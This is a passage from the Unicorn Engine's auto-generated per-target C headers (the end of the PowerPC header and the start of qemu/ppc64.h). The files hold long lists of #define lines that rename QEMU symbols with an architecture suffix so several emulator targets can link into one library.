helper_bcdcfz_ppc #define helper_bcdctz helper_bcdctz_ppc #define helper_bcdcfsq helper_bcdcfsq_ppc #define helper_bcdctsq helper_bcdctsq_ppc #define helper_bcdcpsgn helper_bcdcpsgn_ppc #define helper_bcdsetsgn helper_bcdsetsgn_ppc #define helper_bcds helper_bcds_ppc #define helper_bcdus helper_bcdus_ppc #define helper_bcdsr helper_bcdsr_ppc #define helper_bcdtrunc helper_bcdtrunc_ppc #define helper_bcdutrunc helper_bcdutrunc_ppc #define helper_vsbox helper_vsbox_ppc #define helper_vcipher helper_vcipher_ppc #define helper_vcipherlast helper_vcipherlast_ppc #define helper_vncipher helper_vncipher_ppc #define helper_vncipherlast helper_vncipherlast_ppc #define helper_vshasigmaw helper_vshasigmaw_ppc #define helper_vshasigmad helper_vshasigmad_ppc #define helper_vpermxor helper_vpermxor_ppc #define helper_brinc helper_brinc_ppc #define helper_cntlsw32 helper_cntlsw32_ppc #define helper_cntlzw32 helper_cntlzw32_ppc #define helper_dlmzb helper_dlmzb_ppc #define helper_lmw helper_lmw_ppc #define helper_lsw helper_lsw_ppc #define helper_lswx helper_lswx_ppc #define helper_stsw helper_stsw_ppc #define helper_dcbz helper_dcbz_ppc #define helper_dcbzep helper_dcbzep_ppc #define helper_icbi helper_icbi_ppc #define helper_icbiep helper_icbiep_ppc #define helper_lscbx helper_lscbx_ppc #define helper_lvebx helper_lvebx_ppc #define helper_lvehx helper_lvehx_ppc #define helper_lvewx helper_lvewx_ppc #define helper_stvebx helper_stvebx_ppc #define helper_stvehx helper_stvehx_ppc #define helper_stvewx helper_stvewx_ppc #define helper_tbegin helper_tbegin_ppc #define helper_load_dump_spr helper_load_dump_spr_ppc #define helper_store_dump_spr helper_store_dump_spr_ppc #define helper_hfscr_facility_check helper_hfscr_facility_check_ppc #define helper_fscr_facility_check helper_fscr_facility_check_ppc #define helper_msr_facility_check helper_msr_facility_check_ppc #define helper_store_sdr1 helper_store_sdr1_ppc #define helper_store_pidr helper_store_pidr_ppc #define helper_store_lpidr helper_store_lpidr_ppc #define helper_store_hid0_601 helper_store_hid0_601_ppc #define helper_store_403_pbr helper_store_403_pbr_ppc #define helper_store_40x_dbcr0 helper_store_40x_dbcr0_ppc #define helper_store_40x_sler helper_store_40x_sler_ppc #define helper_clcs helper_clcs_ppc #define ppc_store_msr ppc_store_msr_ppc #define helper_fixup_thrm helper_fixup_thrm_ppc #define store_40x_sler store_40x_sler_ppc #define dump_mmu dump_mmu_ppc #define ppc_cpu_get_phys_page_debug ppc_cpu_get_phys_page_debug_ppc #define helper_store_ibatu helper_store_ibatu_ppc #define helper_store_ibatl helper_store_ibatl_ppc #define helper_store_dbatu helper_store_dbatu_ppc #define helper_store_dbatl helper_store_dbatl_ppc #define helper_store_601_batu helper_store_601_batu_ppc #define helper_store_601_batl helper_store_601_batl_ppc #define ppc_tlb_invalidate_all ppc_tlb_invalidate_all_ppc #define ppc_tlb_invalidate_one ppc_tlb_invalidate_one_ppc #define ppc_store_sdr1 ppc_store_sdr1_ppc #define helper_load_sr helper_load_sr_ppc #define helper_store_sr helper_store_sr_ppc #define helper_tlbia helper_tlbia_ppc #define helper_tlbie helper_tlbie_ppc #define helper_tlbiva helper_tlbiva_ppc #define helper_6xx_tlbd helper_6xx_tlbd_ppc #define helper_6xx_tlbi helper_6xx_tlbi_ppc #define helper_74xx_tlbd helper_74xx_tlbd_ppc #define helper_74xx_tlbi helper_74xx_tlbi_ppc #define helper_rac helper_rac_ppc #define helper_4xx_tlbre_hi helper_4xx_tlbre_hi_ppc #define helper_4xx_tlbre_lo helper_4xx_tlbre_lo_ppc #define helper_4xx_tlbwe_hi helper_4xx_tlbwe_hi_ppc 
#define helper_4xx_tlbwe_lo helper_4xx_tlbwe_lo_ppc #define helper_4xx_tlbsx helper_4xx_tlbsx_ppc #define helper_440_tlbwe helper_440_tlbwe_ppc #define helper_440_tlbre helper_440_tlbre_ppc #define helper_440_tlbsx helper_440_tlbsx_ppc #define helper_booke_setpid helper_booke_setpid_ppc #define helper_booke_set_eplc helper_booke_set_eplc_ppc #define helper_booke_set_epsc helper_booke_set_epsc_ppc #define helper_booke206_tlbwe helper_booke206_tlbwe_ppc #define helper_booke206_tlbre helper_booke206_tlbre_ppc #define helper_booke206_tlbsx helper_booke206_tlbsx_ppc #define helper_booke206_tlbivax helper_booke206_tlbivax_ppc #define helper_booke206_tlbilx0 helper_booke206_tlbilx0_ppc #define helper_booke206_tlbilx1 helper_booke206_tlbilx1_ppc #define helper_booke206_tlbilx3 helper_booke206_tlbilx3_ppc #define helper_booke206_tlbflush helper_booke206_tlbflush_ppc #define helper_check_tlb_flush_local helper_check_tlb_flush_local_ppc #define helper_check_tlb_flush_global helper_check_tlb_flush_global_ppc #define ppc_cpu_tlb_fill ppc_cpu_tlb_fill_ppc #define helper_load_tbl helper_load_tbl_ppc #define helper_load_tbu helper_load_tbu_ppc #define helper_load_atbl helper_load_atbl_ppc #define helper_load_atbu helper_load_atbu_ppc #define helper_load_vtb helper_load_vtb_ppc #define helper_load_601_rtcl helper_load_601_rtcl_ppc #define helper_load_601_rtcu helper_load_601_rtcu_ppc #define helper_store_tbl helper_store_tbl_ppc #define helper_store_tbu helper_store_tbu_ppc #define helper_store_atbl helper_store_atbl_ppc #define helper_store_atbu helper_store_atbu_ppc #define helper_store_601_rtcl helper_store_601_rtcl_ppc #define helper_store_601_rtcu helper_store_601_rtcu_ppc #define helper_load_decr helper_load_decr_ppc #define helper_store_decr helper_store_decr_ppc #define helper_load_hdecr helper_load_hdecr_ppc #define helper_store_hdecr helper_store_hdecr_ppc #define helper_store_vtb helper_store_vtb_ppc #define helper_store_tbu40 helper_store_tbu40_ppc #define helper_load_40x_pit helper_load_40x_pit_ppc #define helper_store_40x_pit helper_store_40x_pit_ppc #define helper_store_booke_tcr helper_store_booke_tcr_ppc #define helper_store_booke_tsr helper_store_booke_tsr_ppc #define helper_load_dcr helper_load_dcr_ppc #define helper_store_dcr helper_store_dcr_ppc #define helper_raise_exception helper_raise_exception_ppc #define helper_book3s_msgsnd helper_book3s_msgsnd_ppc #define helper_cmpb helper_cmpb_ppc #define helper_mfvscr helper_mfvscr_ppc #define helper_vaddshs helper_vaddshs_ppc #define helper_vavguw helper_vavguw_ppc #define helper_vcmpequh helper_vcmpequh_ppc #define helper_vcmpequh_dot helper_vcmpequh_dot_ppc #define helper_vcmpnezh helper_vcmpnezh_ppc #define helper_vcmpnezh_dot helper_vcmpnezh_dot_ppc #define helper_vmsumshm helper_vmsumshm_ppc #define helper_vmsumuhs helper_vmsumuhs_ppc #define helper_vmulosh helper_vmulosh_ppc #define helper_vmulosw helper_vmulosw_ppc #define helper_vbpermq helper_vbpermq_ppc #define helper_vextsw2d helper_vextsw2d_ppc #define helper_stmw helper_stmw_ppc #define ppc_translate_init ppc_translate_init_ppc #define cpu_ppc_init cpu_ppc_init_ppc #define gen_intermediate_code gen_intermediate_code_ppc #define restore_state_to_opc restore_state_to_opc_ppc #define ppc_set_irq ppc_set_irq_ppc #define ppc6xx_irq_init ppc6xx_irq_init_ppc #define ppc40x_core_reset ppc40x_core_reset_ppc #define ppc40x_chip_reset ppc40x_chip_reset_ppc #define ppc40x_system_reset ppc40x_system_reset_ppc #define store_40x_dbcr0 store_40x_dbcr0_ppc #define ppc40x_irq_init 
ppc40x_irq_init_ppc #define ppce500_irq_init ppce500_irq_init_ppc #define ppce500_set_mpic_proxy ppce500_set_mpic_proxy_ppc #define cpu_ppc_get_tb cpu_ppc_get_tb_ppc #define cpu_ppc_load_tbl cpu_ppc_load_tbl_ppc #define cpu_ppc_load_tbu cpu_ppc_load_tbu_ppc #define cpu_ppc_store_tbl cpu_ppc_store_tbl_ppc #define cpu_ppc_store_tbu cpu_ppc_store_tbu_ppc #define cpu_ppc_load_atbl cpu_ppc_load_atbl_ppc #define cpu_ppc_load_atbu cpu_ppc_load_atbu_ppc #define cpu_ppc_store_atbl cpu_ppc_store_atbl_ppc #define cpu_ppc_store_atbu cpu_ppc_store_atbu_ppc #define cpu_ppc_load_vtb cpu_ppc_load_vtb_ppc #define cpu_ppc_store_vtb cpu_ppc_store_vtb_ppc #define cpu_ppc_store_tbu40 cpu_ppc_store_tbu40_ppc #define ppc_decr_clear_on_delivery ppc_decr_clear_on_delivery_ppc #define cpu_ppc_load_decr cpu_ppc_load_decr_ppc #define cpu_ppc_load_hdecr cpu_ppc_load_hdecr_ppc #define cpu_ppc_load_purr cpu_ppc_load_purr_ppc #define cpu_ppc_store_decr cpu_ppc_store_decr_ppc #define cpu_ppc_store_hdecr cpu_ppc_store_hdecr_ppc #define cpu_ppc_store_purr cpu_ppc_store_purr_ppc #define cpu_ppc_tb_init cpu_ppc_tb_init_ppc #define cpu_ppc601_load_rtcu cpu_ppc601_load_rtcu_ppc #define cpu_ppc601_store_rtcu cpu_ppc601_store_rtcu_ppc #define cpu_ppc601_load_rtcl cpu_ppc601_load_rtcl_ppc #define cpu_ppc601_store_rtcl cpu_ppc601_store_rtcl_ppc #define load_40x_pit load_40x_pit_ppc #define store_40x_pit store_40x_pit_ppc #define ppc_40x_timers_init ppc_40x_timers_init_ppc #define ppc_dcr_read ppc_dcr_read_ppc #define ppc_dcr_write ppc_dcr_write_ppc #define ppc_dcr_register ppc_dcr_register_ppc #define ppc_dcr_init ppc_dcr_init_ppc #define ppc_cpu_pir ppc_cpu_pir_ppc #define ppc_irq_reset ppc_irq_reset_ppc #define store_booke_tsr store_booke_tsr_ppc #define get_pteg_offset32 get_pteg_offset32_ppc #define ppc_booke_timers_init ppc_booke_timers_init_ppc #define ppc_hash32_handle_mmu_fault ppc_hash32_handle_mmu_fault_ppc #define gen_helper_store_booke_tsr gen_helper_store_booke_tsr_ppc #define gen_helper_store_booke_tcr gen_helper_store_booke_tcr_ppc #define store_booke_tcr store_booke_tcr_ppc #define ppc_hash32_get_phys_page_debug ppc_hash32_get_phys_page_debug_ppc #endif
unicorn-2.1.1/qemu/ppc64.h
/* Autogen header for Unicorn Engine - DO NOT MODIFY */ #ifndef UNICORN_AUTOGEN_ppc64_H #define UNICORN_AUTOGEN_ppc64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _ppc64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_ppc64 #define reg_read reg_read_ppc64 #define reg_write reg_write_ppc64 #define uc_init uc_init_ppc64 #define uc_add_inline_hook uc_add_inline_hook_ppc64 #define uc_del_inline_hook uc_del_inline_hook_ppc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc64 #define use_idiv_instructions use_idiv_instructions_ppc64
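/*
 * Note: like the other per-target autogen headers in this family, this
 * file renames QEMU's global symbols by appending the target suffix
 * selected above (e.g. uc_init -> uc_init_ppc64), so that several
 * targets built from the same QEMU sources can be linked into a single
 * libunicorn without duplicate-symbol conflicts.
 */
#define 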
arm_arch arm_arch_ppc64 #define tb_target_set_jmp_target tb_target_set_jmp_target_ppc64 #define have_bmi1 have_bmi1_ppc64 #define have_popcnt have_popcnt_ppc64 #define have_avx1 have_avx1_ppc64 #define have_avx2 have_avx2_ppc64 #define have_isa have_isa_ppc64 #define have_altivec have_altivec_ppc64 #define have_vsx have_vsx_ppc64 #define flush_icache_range flush_icache_range_ppc64 #define s390_facilities s390_facilities_ppc64 #define tcg_dump_op tcg_dump_op_ppc64 #define tcg_dump_ops tcg_dump_ops_ppc64 #define tcg_gen_and_i64 tcg_gen_and_i64_ppc64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_ppc64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_ppc64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_ppc64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_ppc64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_ppc64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_ppc64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_ppc64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_ppc64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_ppc64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_ppc64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_ppc64 #define tcg_gen_or_i64 tcg_gen_or_i64_ppc64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_ppc64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_ppc64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_ppc64 #define tcg_gen_st_i64 tcg_gen_st_i64_ppc64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_ppc64 #define cpu_icount_to_ns cpu_icount_to_ns_ppc64 #define cpu_is_stopped cpu_is_stopped_ppc64 #define cpu_get_ticks cpu_get_ticks_ppc64 #define cpu_get_clock cpu_get_clock_ppc64 #define cpu_resume cpu_resume_ppc64 #define qemu_init_vcpu qemu_init_vcpu_ppc64 #define cpu_stop_current cpu_stop_current_ppc64 #define resume_all_vcpus resume_all_vcpus_ppc64 #define vm_start vm_start_ppc64 #define address_space_dispatch_compact address_space_dispatch_compact_ppc64 #define flatview_translate flatview_translate_ppc64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_ppc64 #define qemu_get_cpu qemu_get_cpu_ppc64 #define cpu_address_space_init cpu_address_space_init_ppc64 #define cpu_get_address_space cpu_get_address_space_ppc64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_ppc64 #define cpu_exec_initfn cpu_exec_initfn_ppc64 #define cpu_exec_realizefn cpu_exec_realizefn_ppc64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_ppc64 #define cpu_watchpoint_insert cpu_watchpoint_insert_ppc64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_ppc64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_ppc64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_ppc64 #define cpu_breakpoint_insert cpu_breakpoint_insert_ppc64 #define cpu_breakpoint_remove cpu_breakpoint_remove_ppc64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_ppc64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_ppc64 #define cpu_abort cpu_abort_ppc64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_ppc64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_ppc64 #define flatview_add_to_dispatch flatview_add_to_dispatch_ppc64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_ppc64 #define qemu_ram_get_offset qemu_ram_get_offset_ppc64 #define qemu_ram_get_used_length qemu_ram_get_used_length_ppc64 #define qemu_ram_is_shared qemu_ram_is_shared_ppc64 #define qemu_ram_pagesize qemu_ram_pagesize_ppc64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_ppc64 #define qemu_ram_alloc qemu_ram_alloc_ppc64 #define qemu_ram_free qemu_ram_free_ppc64 
#define qemu_map_ram_ptr qemu_map_ram_ptr_ppc64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_ppc64 #define qemu_ram_block_from_host qemu_ram_block_from_host_ppc64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_ppc64 #define cpu_check_watchpoint cpu_check_watchpoint_ppc64 #define iotlb_to_section iotlb_to_section_ppc64 #define address_space_dispatch_new address_space_dispatch_new_ppc64 #define address_space_dispatch_free address_space_dispatch_free_ppc64 #define flatview_read_continue flatview_read_continue_ppc64 #define address_space_read_full address_space_read_full_ppc64 #define address_space_write address_space_write_ppc64 #define address_space_rw address_space_rw_ppc64 #define cpu_physical_memory_rw cpu_physical_memory_rw_ppc64 #define address_space_write_rom address_space_write_rom_ppc64 #define cpu_flush_icache_range cpu_flush_icache_range_ppc64 #define cpu_exec_init_all cpu_exec_init_all_ppc64 #define address_space_access_valid address_space_access_valid_ppc64 #define address_space_map address_space_map_ppc64 #define address_space_unmap address_space_unmap_ppc64 #define cpu_physical_memory_map cpu_physical_memory_map_ppc64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_ppc64 #define cpu_memory_rw_debug cpu_memory_rw_debug_ppc64 #define qemu_target_page_size qemu_target_page_size_ppc64 #define qemu_target_page_bits qemu_target_page_bits_ppc64 #define qemu_target_page_bits_min qemu_target_page_bits_min_ppc64 #define target_words_bigendian target_words_bigendian_ppc64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_ppc64 #define ram_block_discard_range ram_block_discard_range_ppc64 #define ramblock_is_pmem ramblock_is_pmem_ppc64 #define page_size_init page_size_init_ppc64 #define set_preferred_target_page_bits set_preferred_target_page_bits_ppc64 #define finalize_target_page_bits finalize_target_page_bits_ppc64 #define cpu_outb cpu_outb_ppc64 #define cpu_outw cpu_outw_ppc64 #define cpu_outl cpu_outl_ppc64 #define cpu_inb cpu_inb_ppc64 #define cpu_inw cpu_inw_ppc64 #define cpu_inl cpu_inl_ppc64 #define memory_map memory_map_ppc64 #define memory_map_io memory_map_io_ppc64 #define memory_map_ptr memory_map_ptr_ppc64 #define memory_cow memory_cow_ppc64 #define memory_unmap memory_unmap_ppc64 #define memory_moveout memory_moveout_ppc64 #define memory_movein memory_movein_ppc64 #define memory_free memory_free_ppc64 #define flatview_unref flatview_unref_ppc64 #define address_space_get_flatview address_space_get_flatview_ppc64 #define memory_region_transaction_begin memory_region_transaction_begin_ppc64 #define memory_region_transaction_commit memory_region_transaction_commit_ppc64 #define memory_region_init memory_region_init_ppc64 #define memory_region_access_valid memory_region_access_valid_ppc64 #define memory_region_dispatch_read memory_region_dispatch_read_ppc64 #define memory_region_dispatch_write memory_region_dispatch_write_ppc64 #define memory_region_init_io memory_region_init_io_ppc64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_ppc64 #define memory_region_size memory_region_size_ppc64 #define memory_region_set_readonly memory_region_set_readonly_ppc64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_ppc64 #define memory_region_from_host memory_region_from_host_ppc64 #define memory_region_get_ram_addr memory_region_get_ram_addr_ppc64 #define memory_region_add_subregion memory_region_add_subregion_ppc64 #define memory_region_del_subregion memory_region_del_subregion_ppc64 #define 
memory_region_add_subregion_overlap memory_region_add_subregion_overlap_ppc64 #define memory_region_find memory_region_find_ppc64 #define memory_region_filter_subregions memory_region_filter_subregions_ppc64 #define memory_listener_register memory_listener_register_ppc64 #define memory_listener_unregister memory_listener_unregister_ppc64 #define address_space_remove_listeners address_space_remove_listeners_ppc64 #define address_space_init address_space_init_ppc64 #define address_space_destroy address_space_destroy_ppc64 #define memory_region_init_ram memory_region_init_ram_ppc64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_ppc64 #define find_memory_mapping find_memory_mapping_ppc64 #define exec_inline_op exec_inline_op_ppc64 #define floatx80_default_nan floatx80_default_nan_ppc64 #define float_raise float_raise_ppc64 #define float16_is_quiet_nan float16_is_quiet_nan_ppc64 #define float16_is_signaling_nan float16_is_signaling_nan_ppc64 #define float32_is_quiet_nan float32_is_quiet_nan_ppc64 #define float32_is_signaling_nan float32_is_signaling_nan_ppc64 #define float64_is_quiet_nan float64_is_quiet_nan_ppc64 #define float64_is_signaling_nan float64_is_signaling_nan_ppc64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_ppc64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_ppc64 #define floatx80_silence_nan floatx80_silence_nan_ppc64 #define propagateFloatx80NaN propagateFloatx80NaN_ppc64 #define float128_is_quiet_nan float128_is_quiet_nan_ppc64 #define float128_is_signaling_nan float128_is_signaling_nan_ppc64 #define float128_silence_nan float128_silence_nan_ppc64 #define float16_add float16_add_ppc64 #define float16_sub float16_sub_ppc64 #define float32_add float32_add_ppc64 #define float32_sub float32_sub_ppc64 #define float64_add float64_add_ppc64 #define float64_sub float64_sub_ppc64 #define float16_mul float16_mul_ppc64 #define float32_mul float32_mul_ppc64 #define float64_mul float64_mul_ppc64 #define float16_muladd float16_muladd_ppc64 #define float32_muladd float32_muladd_ppc64 #define float64_muladd float64_muladd_ppc64 #define float16_div float16_div_ppc64 #define float32_div float32_div_ppc64 #define float64_div float64_div_ppc64 #define float16_to_float32 float16_to_float32_ppc64 #define float16_to_float64 float16_to_float64_ppc64 #define float32_to_float16 float32_to_float16_ppc64 #define float32_to_float64 float32_to_float64_ppc64 #define float64_to_float16 float64_to_float16_ppc64 #define float64_to_float32 float64_to_float32_ppc64 #define float16_round_to_int float16_round_to_int_ppc64 #define float32_round_to_int float32_round_to_int_ppc64 #define float64_round_to_int float64_round_to_int_ppc64 #define float16_to_int16_scalbn float16_to_int16_scalbn_ppc64 #define float16_to_int32_scalbn float16_to_int32_scalbn_ppc64 #define float16_to_int64_scalbn float16_to_int64_scalbn_ppc64 #define float32_to_int16_scalbn float32_to_int16_scalbn_ppc64 #define float32_to_int32_scalbn float32_to_int32_scalbn_ppc64 #define float32_to_int64_scalbn float32_to_int64_scalbn_ppc64 #define float64_to_int16_scalbn float64_to_int16_scalbn_ppc64 #define float64_to_int32_scalbn float64_to_int32_scalbn_ppc64 #define float64_to_int64_scalbn float64_to_int64_scalbn_ppc64 #define float16_to_int16 float16_to_int16_ppc64 #define float16_to_int32 float16_to_int32_ppc64 #define float16_to_int64 float16_to_int64_ppc64 #define float32_to_int16 float32_to_int16_ppc64 #define float32_to_int32 float32_to_int32_ppc64 #define float32_to_int64 
float32_to_int64_ppc64 #define float64_to_int16 float64_to_int16_ppc64 #define float64_to_int32 float64_to_int32_ppc64 #define float64_to_int64 float64_to_int64_ppc64 #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_ppc64 #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_ppc64 #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_ppc64 #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_ppc64 #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_ppc64 #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_ppc64 #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_ppc64 #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_ppc64 #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_ppc64 #define float16_to_uint16_scalbn float16_to_uint16_scalbn_ppc64 #define float16_to_uint32_scalbn float16_to_uint32_scalbn_ppc64 #define float16_to_uint64_scalbn float16_to_uint64_scalbn_ppc64 #define float32_to_uint16_scalbn float32_to_uint16_scalbn_ppc64 #define float32_to_uint32_scalbn float32_to_uint32_scalbn_ppc64 #define float32_to_uint64_scalbn float32_to_uint64_scalbn_ppc64 #define float64_to_uint16_scalbn float64_to_uint16_scalbn_ppc64 #define float64_to_uint32_scalbn float64_to_uint32_scalbn_ppc64 #define float64_to_uint64_scalbn float64_to_uint64_scalbn_ppc64 #define float16_to_uint16 float16_to_uint16_ppc64 #define float16_to_uint32 float16_to_uint32_ppc64 #define float16_to_uint64 float16_to_uint64_ppc64 #define float32_to_uint16 float32_to_uint16_ppc64 #define float32_to_uint32 float32_to_uint32_ppc64 #define float32_to_uint64 float32_to_uint64_ppc64 #define float64_to_uint16 float64_to_uint16_ppc64 #define float64_to_uint32 float64_to_uint32_ppc64 #define float64_to_uint64 float64_to_uint64_ppc64 #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_ppc64 #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_ppc64 #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_ppc64 #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_ppc64 #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_ppc64 #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_ppc64 #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_ppc64 #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_ppc64 #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_ppc64 #define int64_to_float16_scalbn int64_to_float16_scalbn_ppc64 #define int32_to_float16_scalbn int32_to_float16_scalbn_ppc64 #define int16_to_float16_scalbn int16_to_float16_scalbn_ppc64 #define int64_to_float16 int64_to_float16_ppc64 #define int32_to_float16 int32_to_float16_ppc64 #define int16_to_float16 int16_to_float16_ppc64 #define int64_to_float32_scalbn int64_to_float32_scalbn_ppc64 #define int32_to_float32_scalbn int32_to_float32_scalbn_ppc64 #define int16_to_float32_scalbn int16_to_float32_scalbn_ppc64 #define int64_to_float32 int64_to_float32_ppc64 #define int32_to_float32 int32_to_float32_ppc64 #define int16_to_float32 int16_to_float32_ppc64 #define int64_to_float64_scalbn int64_to_float64_scalbn_ppc64 #define int32_to_float64_scalbn int32_to_float64_scalbn_ppc64 #define int16_to_float64_scalbn int16_to_float64_scalbn_ppc64 #define int64_to_float64 int64_to_float64_ppc64 #define int32_to_float64 int32_to_float64_ppc64 #define int16_to_float64 
int16_to_float64_ppc64 #define uint64_to_float16_scalbn uint64_to_float16_scalbn_ppc64 #define uint32_to_float16_scalbn uint32_to_float16_scalbn_ppc64 #define uint16_to_float16_scalbn uint16_to_float16_scalbn_ppc64 #define uint64_to_float16 uint64_to_float16_ppc64 #define uint32_to_float16 uint32_to_float16_ppc64 #define uint16_to_float16 uint16_to_float16_ppc64 #define uint64_to_float32_scalbn uint64_to_float32_scalbn_ppc64 #define uint32_to_float32_scalbn uint32_to_float32_scalbn_ppc64 #define uint16_to_float32_scalbn uint16_to_float32_scalbn_ppc64 #define uint64_to_float32 uint64_to_float32_ppc64 #define uint32_to_float32 uint32_to_float32_ppc64 #define uint16_to_float32 uint16_to_float32_ppc64 #define uint64_to_float64_scalbn uint64_to_float64_scalbn_ppc64 #define uint32_to_float64_scalbn uint32_to_float64_scalbn_ppc64 #define uint16_to_float64_scalbn uint16_to_float64_scalbn_ppc64 #define uint64_to_float64 uint64_to_float64_ppc64 #define uint32_to_float64 uint32_to_float64_ppc64 #define uint16_to_float64 uint16_to_float64_ppc64 #define float16_min float16_min_ppc64 #define float16_minnum float16_minnum_ppc64 #define float16_minnummag float16_minnummag_ppc64 #define float16_max float16_max_ppc64 #define float16_maxnum float16_maxnum_ppc64 #define float16_maxnummag float16_maxnummag_ppc64 #define float32_min float32_min_ppc64 #define float32_minnum float32_minnum_ppc64 #define float32_minnummag float32_minnummag_ppc64 #define float32_max float32_max_ppc64 #define float32_maxnum float32_maxnum_ppc64 #define float32_maxnummag float32_maxnummag_ppc64 #define float64_min float64_min_ppc64 #define float64_minnum float64_minnum_ppc64 #define float64_minnummag float64_minnummag_ppc64 #define float64_max float64_max_ppc64 #define float64_maxnum float64_maxnum_ppc64 #define float64_maxnummag float64_maxnummag_ppc64 #define float16_compare float16_compare_ppc64 #define float16_compare_quiet float16_compare_quiet_ppc64 #define float32_compare float32_compare_ppc64 #define float32_compare_quiet float32_compare_quiet_ppc64 #define float64_compare float64_compare_ppc64 #define float64_compare_quiet float64_compare_quiet_ppc64 #define float16_scalbn float16_scalbn_ppc64 #define float32_scalbn float32_scalbn_ppc64 #define float64_scalbn float64_scalbn_ppc64 #define float16_sqrt float16_sqrt_ppc64 #define float32_sqrt float32_sqrt_ppc64 #define float64_sqrt float64_sqrt_ppc64 #define float16_default_nan float16_default_nan_ppc64 #define float32_default_nan float32_default_nan_ppc64 #define float64_default_nan float64_default_nan_ppc64 #define float128_default_nan float128_default_nan_ppc64 #define float16_silence_nan float16_silence_nan_ppc64 #define float32_silence_nan float32_silence_nan_ppc64 #define float64_silence_nan float64_silence_nan_ppc64 #define float16_squash_input_denormal float16_squash_input_denormal_ppc64 #define float32_squash_input_denormal float32_squash_input_denormal_ppc64 #define float64_squash_input_denormal float64_squash_input_denormal_ppc64 #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_ppc64 #define roundAndPackFloatx80 roundAndPackFloatx80_ppc64 #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_ppc64 #define int32_to_floatx80 int32_to_floatx80_ppc64 #define int32_to_float128 int32_to_float128_ppc64 #define int64_to_floatx80 int64_to_floatx80_ppc64 #define int64_to_float128 int64_to_float128_ppc64 #define uint64_to_float128 uint64_to_float128_ppc64 #define float32_to_floatx80 float32_to_floatx80_ppc64 #define float32_to_float128 
float32_to_float128_ppc64 #define float32_rem float32_rem_ppc64 #define float32_exp2 float32_exp2_ppc64 #define float32_log2 float32_log2_ppc64 #define float32_eq float32_eq_ppc64 #define float32_le float32_le_ppc64 #define float32_lt float32_lt_ppc64 #define float32_unordered float32_unordered_ppc64 #define float32_eq_quiet float32_eq_quiet_ppc64 #define float32_le_quiet float32_le_quiet_ppc64 #define float32_lt_quiet float32_lt_quiet_ppc64 #define float32_unordered_quiet float32_unordered_quiet_ppc64 #define float64_to_floatx80 float64_to_floatx80_ppc64 #define float64_to_float128 float64_to_float128_ppc64 #define float64_rem float64_rem_ppc64 #define float64_log2 float64_log2_ppc64 #define float64_eq float64_eq_ppc64 #define float64_le float64_le_ppc64 #define float64_lt float64_lt_ppc64 #define float64_unordered float64_unordered_ppc64 #define float64_eq_quiet float64_eq_quiet_ppc64 #define float64_le_quiet float64_le_quiet_ppc64 #define float64_lt_quiet float64_lt_quiet_ppc64 #define float64_unordered_quiet float64_unordered_quiet_ppc64 #define floatx80_to_int32 floatx80_to_int32_ppc64 #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_ppc64 #define floatx80_to_int64 floatx80_to_int64_ppc64 #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_ppc64 #define floatx80_to_float32 floatx80_to_float32_ppc64 #define floatx80_to_float64 floatx80_to_float64_ppc64 #define floatx80_to_float128 floatx80_to_float128_ppc64 #define floatx80_round 